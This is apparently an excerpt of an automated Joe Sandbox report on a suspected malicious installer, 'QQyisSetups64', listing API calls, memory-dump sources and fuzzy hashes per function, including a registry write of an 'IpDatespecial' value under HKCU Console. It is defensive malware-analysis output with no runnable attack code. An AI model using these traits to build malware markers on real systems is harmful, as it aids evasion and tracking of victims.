                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,037A6318,00000008,03793E36,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C), ref: 03793D3F
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 03793D73
                                                                                                                                                                                                                        • Part of subcall function 03798E5B: __mtinitlocknum.LIBCMT ref: 03798E71
                                                                                                                                                                                                                        • Part of subcall function 03798E5B: __amsg_exit.LIBCMT ref: 03798E7D
                                                                                                                                                                                                                        • Part of subcall function 03798E5B: EnterCriticalSection.KERNEL32(00000000,00000000,?,03793F06,0000000D,037A6340,00000008,03793FFF,00000000,?,037910F0,00000000,037A6278,00000008,03791155,?), ref: 03798E85
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 03793D80
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 03793D94
                                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 03793DB2
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                                                                                      • Opcode ID: 2ab875409470e3fae09dbf1ba4b6a2c097f4be36c2a4fb7bea6a4eea0a80b38e
                                                                                                                                                                                                                      • Instruction ID: 3065a5125273642949e5e4dbcf7dec0fc0fe2f2b49e44a6be12d16d526d2a01c
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2ab875409470e3fae09dbf1ba4b6a2c097f4be36c2a4fb7bea6a4eea0a80b38e
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49018479400B00EFFB20EF69E80874AFBE0AF85314F108B4ED5966B790CBB4A541CB15
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(KERNEL32.DLL,02C97C00,00000008,02C898EA,00000000,00000000,?,02C89FB0,00000000,00000001,00000000,?,02C8C0CF,00000018,02C97C70,0000000C), ref: 02C897F3
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 02C89827
                                                                                                                                                                                                                        • Part of subcall function 02C8C144: __mtinitlocknum.LIBCMT ref: 02C8C15A
                                                                                                                                                                                                                        • Part of subcall function 02C8C144: __amsg_exit.LIBCMT ref: 02C8C166
                                                                                                                                                                                                                        • Part of subcall function 02C8C144: EnterCriticalSection.KERNEL32(00000000,00000000,?,02C899BA,0000000D,02C97C28,00000008,02C89AB1,00000000,?,02C87711,00000000,02C97B60,00000008,02C87776,?), ref: 02C8C16E
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(?), ref: 02C89834
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 02C89848
                                                                                                                                                                                                                      • ___addlocaleref.LIBCMT ref: 02C89866
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __lock$CriticalEnterHandleIncrementInterlockedModuleSection___addlocaleref__amsg_exit__mtinitlocknum
                                                                                                                                                                                                                      • String ID: KERNEL32.DLL
                                                                                                                                                                                                                      • API String ID: 637971194-2576044830
                                                                                                                                                                                                                      • Opcode ID: ef5a588bb8dad73cee5524e566644423bf04a431b1b376caee42ed514a2181d5
                                                                                                                                                                                                                      • Instruction ID: d10ab32b1440513487f0aee054562010db1d492fcd443576f1d6c312d2c8cc8f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ef5a588bb8dad73cee5524e566644423bf04a431b1b376caee42ed514a2181d5
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E701C0B1840B00DFEB21AF79C84835AFBE1AF50328F10894ED49696390CBB4A644DF25
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • RegOpenKeyExW.ADVAPI32(80000001,Console,00000000,00000002), ref: 0378B7A7
                                                                                                                                                                                                                      • RegDeleteValueW.ADVAPI32(?,IpDatespecial), ref: 0378B7B7
                                                                                                                                                                                                                      • RegSetValueExW.ADVAPI32(?,IpDatespecial,00000000,00000003,?,00000004), ref: 0378B7CE
                                                                                                                                                                                                                      • RegCloseKey.ADVAPI32(?,?,00000004), ref: 0378B7D9
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Value$CloseDeleteOpen
                                                                                                                                                                                                                      • String ID: Console$IpDatespecial
                                                                                                                                                                                                                      • API String ID: 3183427449-1840232981
                                                                                                                                                                                                                      • Opcode ID: 6ec2f2a8e3abfbdcebd180ef9cd42c0f7a46b83cce5b81837e02fb8732a15ea9
                                                                                                                                                                                                                      • Instruction ID: 3b1cd721c8cfce0b466b76216807a7f14bf07667cea2edec6c2bf7635a983e74
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ec2f2a8e3abfbdcebd180ef9cd42c0f7a46b83cce5b81837e02fb8732a15ea9
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 26F0A771344744FFD3249764AC4FF5BB754F7C9711F508A0DFBC4651828664A100E755
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A031D
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A032E
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A033C
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                                                                                                      • API String ID: 803148776-2671469338
                                                                                                                                                                                                                      • Opcode ID: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                                                                      • Instruction ID: 29772e28fb9e27a4a81fad4390bc0c92feb2c0cc0beae7b7a61494d654ee8a72
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a1f0d33c8d38bd48e94782b4de51ff7935ea793739f44933f6f473294c896614
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: DBE0E53C500604CFEF20EB6C908AB6837D9BF8C615F590AA7940CCF222C728E4908A82
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C93412
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C93423
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C93431
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID: MOC$RCC$csm
                                                                                                                                                                                                                      • API String ID: 803148776-2671469338
                                                                                                                                                                                                                      • Opcode ID: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                                                                      • Instruction ID: bfec00e7dc39746f03452ec954c801756d92e7b65a7a5488e33d272ec0e89072
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6cafc6eb67b1167ca934f12c74b901a19b36c58c2209ef507fb1707306695bdb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 53E01A345041888ECB20AB68C14DB783AE5FBC9318F5A84F1E41DCB222C739EA50DD53
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • _malloc.LIBCMT ref: 03789C3F
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __FF_MSGBANNER.LIBCMT ref: 0378F68C
                                                                                                                                                                                                                        • Part of subcall function 0378F673: __NMSG_WRITE.LIBCMT ref: 0378F693
                                                                                                                                                                                                                        • Part of subcall function 0378F673: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,03794500,00000000,00000001,00000000,?,03798DE6,00000018,037A6448,0000000C,03798E76), ref: 0378F6B8
                                                                                                                                                                                                                      • _free.LIBCMT ref: 03789C63
                                                                                                                                                                                                                      • _memset.LIBCMT ref: 03789CBB
                                                                                                                                                                                                                        • Part of subcall function 0378A610: GetObjectW.GDI32(?,00000054,?), ref: 0378A62E
                                                                                                                                                                                                                      • CreateDIBSection.GDI32(00000000,00000008,00000000,00000000,00000000,00000000), ref: 03789CD3
                                                                                                                                                                                                                      • _free.LIBCMT ref: 03789CE4
                                                                                                                                                                                                                      • _free.LIBCMT ref: 03789D23
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _free$AllocateCreateHeapObjectSection_malloc_memset
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1756752955-0
                                                                                                                                                                                                                      • Opcode ID: 45e76e65248c37a7b4dc02d967769d8c05dc0b6d58592696664fbba2b1ca3df0
                                                                                                                                                                                                                      • Instruction ID: c892edded80128f35afea36b40f79f06df89ab584c4ca4b5e98975e57ed96163
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 45e76e65248c37a7b4dc02d967769d8c05dc0b6d58592696664fbba2b1ca3df0
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8031B6B26403056BE710EF75E884B67B7D8FF4A314F04853ADA09CB640E7B1E454CBA5
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF), ref: 037850CA
                                                                                                                                                                                                                      • WSASetLastError.WS2_32(0000139F), ref: 037850E2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 037850EC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                                                                      • Opcode ID: f4a1045818ff3de6ed2c35a5f3b9641880ae545e543469e8c3dc4eb710d6237a
                                                                                                                                                                                                                      • Instruction ID: 5cd285c58dafd9d1a5b2eeccdaa6cea570c2a7015f3924fea22f66931dc39329
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f4a1045818ff3de6ed2c35a5f3b9641880ae545e543469e8c3dc4eb710d6237a
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6331B076A84748ABD714EF64DC49B6AB3E8EB49720F10895EED15C7780E73AE800CB50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • EnterCriticalSection.KERNEL32(000002FF), ref: 02C850AA
                                                                                                                                                                                                                      • WSASetLastError.WS2_32(0000139F), ref: 02C850C2
                                                                                                                                                                                                                      • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,?,00000000,000000FF), ref: 02C850CC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CriticalSection$EnterErrorLastLeave
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 4082018349-0
                                                                                                                                                                                                                      • Opcode ID: 34c95b3af14ad86c14c285f5dee64d872f9c8dca5156764cf9d1e06e2ece1503
                                                                                                                                                                                                                      • Instruction ID: 419dd11548e58f5ae8626bb86ed7a980c633122736e7f7afc923c5f919d91520
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34c95b3af14ad86c14c285f5dee64d872f9c8dca5156764cf9d1e06e2ece1503
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CF31D072A442449BD720DF94EC49B6BB3E9FB48759F408A1AF906C7680D776E810CB90
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C848E1
                                                                                                                                                                                                                      • WaitForSingleObject.KERNEL32(?,000000FF,?,E484B528,?,?,?), ref: 02C848EC
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000258,?,E484B528,?,?,?), ref: 02C848F9
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C84914
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,E484B528,?,?,?), ref: 02C8491D
                                                                                                                                                                                                                      • Sleep.KERNEL32(0000012C,?,E484B528,?,?,?), ref: 02C8492E
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: CloseHandleObjectSingleSleepWait
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 640476663-0
                                                                                                                                                                                                                      • Opcode ID: 989536844a2ff9e6f88224ce41686fb591749af47cebceb9cb6c850f64db8f01
                                                                                                                                                                                                                      • Instruction ID: 906cd1e3994a6414f968d048a29850fa0dcfa7f44b0b9b8e9aa5026d7eb65c73
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 989536844a2ff9e6f88224ce41686fb591749af47cebceb9cb6c850f64db8f01
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 33216A721042849BCB14FBA8DD48A87F3F9FF897547554B08E554C7285C6349805CFE0
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 037A05D6
                                                                                                                                                                                                                        • Part of subcall function 037A00B7: __getptd.LIBCMT ref: 037A00C5
                                                                                                                                                                                                                        • Part of subcall function 037A00B7: __getptd.LIBCMT ref: 037A00D3
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A05E0
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A05EE
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A05FC
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 037A0607
                                                                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 037A062D
                                                                                                                                                                                                                        • Part of subcall function 037A015C: __CallSettingFrame@12.LIBCMT ref: 037A01A8
                                                                                                                                                                                                                        • Part of subcall function 037A06D4: __getptd.LIBCMT ref: 037A06E3
                                                                                                                                                                                                                        • Part of subcall function 037A06D4: __getptd.LIBCMT ref: 037A06F1
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                                                                      • Opcode ID: fd405b44e0134d1d33cc028f03597bed877d160d75f2787ecf98786bf8b9e7aa
                                                                                                                                                                                                                      • Instruction ID: 5539cbce340d4943f7827171453247fed249b28a5c0442f124bfba58b8036875
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fd405b44e0134d1d33cc028f03597bed877d160d75f2787ecf98786bf8b9e7aa
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9911C9B9D00709DFEF10EFA4D488B9D7BB0FF48314F10866AE825AB250DB3899159B50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __CreateFrameInfo.LIBCMT ref: 02C936CB
                                                                                                                                                                                                                        • Part of subcall function 02C9325B: __getptd.LIBCMT ref: 02C93269
                                                                                                                                                                                                                        • Part of subcall function 02C9325B: __getptd.LIBCMT ref: 02C93277
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C936D5
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C936E3
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C936F1
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C936FC
                                                                                                                                                                                                                      • _CallCatchBlock2.LIBCMT ref: 02C93722
                                                                                                                                                                                                                        • Part of subcall function 02C93300: __CallSettingFrame@12.LIBCMT ref: 02C9334C
                                                                                                                                                                                                                        • Part of subcall function 02C937C9: __getptd.LIBCMT ref: 02C937D8
                                                                                                                                                                                                                        • Part of subcall function 02C937C9: __getptd.LIBCMT ref: 02C937E6
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: __getptd$Call$Block2CatchCreateFrameFrame@12InfoSetting__amsg_exit__getptd_noexit
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 1602911419-0
                                                                                                                                                                                                                      • Opcode ID: c9699f91bb456667088a2856ee36da4afb6a189b4520278d2078b146ff2f24ab
                                                                                                                                                                                                                      • Instruction ID: 2c6d401e6eec093961c71abe6f6458b2549adcb47500d7b93755ffca2a578b47
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c9699f91bb456667088a2856ee36da4afb6a189b4520278d2078b146ff2f24ab
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE11D7B1C00249DFDF00EFA4D549AAD7BB2FF04314F1085AAE868A7350DB399A15EF50
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 03794891
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __getptd_noexit.LIBCMT ref: 03793E5E
                                                                                                                                                                                                                        • Part of subcall function 03793E5B: __amsg_exit.LIBCMT ref: 03793E6B
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 037948B1
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 037948C1
                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 037948DE
                                                                                                                                                                                                                      • _free.LIBCMT ref: 037948F1
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(028B1688), ref: 03794909
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2578511875.0000000003780000.00000040.00001000.00020000.00000000.sdmp, Offset: 03780000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2578511875.00000000037B4000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_3780000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                                                                                      • Opcode ID: d61f256f9571ca6c44e9acbffa0d98f0cae4e6cb93675107915c552cd9180820
                                                                                                                                                                                                                      • Instruction ID: e5f2ba6a4f8b51b6fb6e6bee0db913618e69375e44ee3807bf8440b7e7c00727
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d61f256f9571ca6c44e9acbffa0d98f0cae4e6cb93675107915c552cd9180820
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1A01A135D01B55ABFE10FB2AB409B5DB3A0BF49720F094387D910AB280CB385452DBD2
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • __getptd.LIBCMT ref: 02C8D9CA
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __getptd_noexit.LIBCMT ref: 02C89912
                                                                                                                                                                                                                        • Part of subcall function 02C8990F: __amsg_exit.LIBCMT ref: 02C8991F
                                                                                                                                                                                                                      • __amsg_exit.LIBCMT ref: 02C8D9EA
                                                                                                                                                                                                                      • __lock.LIBCMT ref: 02C8D9FA
                                                                                                                                                                                                                      • InterlockedDecrement.KERNEL32(?), ref: 02C8DA17
                                                                                                                                                                                                                      • _free.LIBCMT ref: 02C8DA2A
                                                                                                                                                                                                                      • InterlockedIncrement.KERNEL32(02D41688), ref: 02C8DA42
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000006.00000002.2575068878.0000000002C81000.00000020.00001000.00020000.00000000.sdmp, Offset: 02C80000, based on PE: true
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575013434.0000000002C80000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575240447.0000000002C95000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575309576.0000000002C99000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575391810.0000000002C9F000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      • Associated: 00000006.00000002.2575482323.0000000002CA1000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_6_2_2c80000_QQyisSetups64.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3470314060-0
                                                                                                                                                                                                                      • Opcode ID: 9a04b21a23d3e7685340b47acfe8d1696f6d8fc24ff19ccbfea2cb841f3f3ae2
                                                                                                                                                                                                                      • Instruction ID: 47e1adb44f1eca315dd4ec9d9083317470e26529975ce10f00309a9a4846ae93
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9a04b21a23d3e7685340b47acfe8d1696f6d8fc24ff19ccbfea2cb841f3f3ae2
